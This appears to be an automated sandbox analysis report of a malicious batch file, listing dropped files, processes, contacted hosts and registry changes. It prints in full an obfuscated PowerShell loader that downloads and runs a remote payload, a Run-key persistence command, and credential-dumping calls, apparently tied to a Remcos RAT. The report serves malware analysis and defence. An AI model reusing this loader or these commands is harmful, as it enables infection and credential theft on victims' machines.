Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
rIMGTR657365756.bat
|
ASCII text, with very long lines (6158), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51ps21gz.2ep.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azahvgxl.fuh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctl2d2ua.rov.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgkrhyhk.deq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvC236.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xe99f2a77, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qalgwws
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H9DE7R57L5U6XC0870LW.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\aspargessuppens.Bri
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully
#>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If
($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function
Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal
knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan,
Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod.
C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka
mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent
';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec
lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets
' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres
(Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg:
GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB
RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu
aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand
');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe
NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona
Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S
ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL
KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ
areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv
');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt.
UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg
rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y
ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi
roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi
fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r
,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl
RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF
ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS
nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh
Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp)
ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo
AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek
ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres
(Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k
Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres
(Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv
etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva
ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe
oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh
iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor
DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch
pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U
ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI
ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities
Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function
Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated
-lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){
& ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets
'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE
te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/
S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets
'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/
PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm
artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres
(Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg:
GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB
RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu
aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand
');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe
NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona
Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S
ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL
KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ
areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv
');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt.
UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg
rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y
ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi
roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi
fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r
,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl
RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF
ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS
nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh
Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp)
ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo
AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek
ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres
(Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k
Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres
(Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv
etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva
ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe
oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh
iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor
DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch
pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U
ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI
ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ
/d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer%
($Predestinationism)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle
1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
|
There are 5 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://plieltd.top/l
|
unknown
|
||
|
https://miottoezanella.com
|
unknown
|
||
|
https://aka.ms/pscore6lBeq
|
unknown
|
||
|
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
|
unknown
|
||
|
http://geoplugin.net/json.gp.
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://miottoezanella.com/Hovedvrket.rarXR
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://plieltd.top/nwnNBPSeuTV8.binafsksGodmiottoezanella.com/nwnNBPSeuTV8.bin
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://miottoezanella.com/Hovedvrket.rar
|
194.76.118.27
|
||
|
https://plieltd.top/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://miottoezanella.com/Hovedvrket.rarP
|
unknown
|
||
|
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
|
unknown
|
||
|
http://miottoezanella.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://miottoezanella.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://plieltd.top/nwnNBPSeuTV8.bin
|
104.21.56.189
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://www.imvu.comata
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 36 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
185.236.203.101
|
|
|
|
plieltd.top
|
104.21.56.189
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
miottoezanella.com
|
194.76.118.27
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.236.203.101
|
pelele.duckdns.org
|
Romania
|
|
|
|
104.21.56.189
|
plieltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
194.76.118.27
|
miottoezanella.com
|
Italy
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\hovedparts
|
Bagateller
|
||
|
HKEY_CURRENT_USER\Environment
|
Afgrnsningsproblemer
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Aversi
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9E8F000
|
direct allocation
|
page execute and read and write
|
|
|
|
2253E000
|
stack
|
page read and write
|
|
|
|
1DCBFB5D000
|
trusted library allocation
|
page read and write
|
|
|
|
224FD000
|
stack
|
page read and write
|
|
|
|
6B0E000
|
heap
|
page read and write
|
|
|
|
6B40000
|
heap
|
page read and write
|
|
|
|
5C55000
|
trusted library allocation
|
page read and write
|
|
|
|
8A80000
|
direct allocation
|
page execute and read and write
|
|
|
|
2FC5000
|
heap
|
page read and write
|
||
|
4765000
|
heap
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
471F000
|
stack
|
page read and write
|
||
|
222C0000
|
heap
|
page read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
85A0000
|
heap
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
68D5000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
1DCADB51000
|
heap
|
page read and write
|
||
|
6B7A000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
6AD7000
|
heap
|
page read and write
|
||
|
6B89000
|
heap
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
224BC000
|
stack
|
page read and write
|
||
|
22A26000
|
heap
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
1DCAF440000
|
heap
|
page execute and read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
71F000
|
unkown
|
page read and write
|
||
|
72DB000
|
stack
|
page read and write
|
||
|
1DCAF4FD000
|
heap
|
page read and write
|
||
|
1DCAFAE0000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
1DCADB08000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
47A4000
|
heap
|
page read and write
|
||
|
22990000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
22220000
|
direct allocation
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
4773000
|
heap
|
page read and write
|
||
|
22BFC000
|
heap
|
page read and write
|
||
|
608000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
3210000
|
trusted library allocation
|
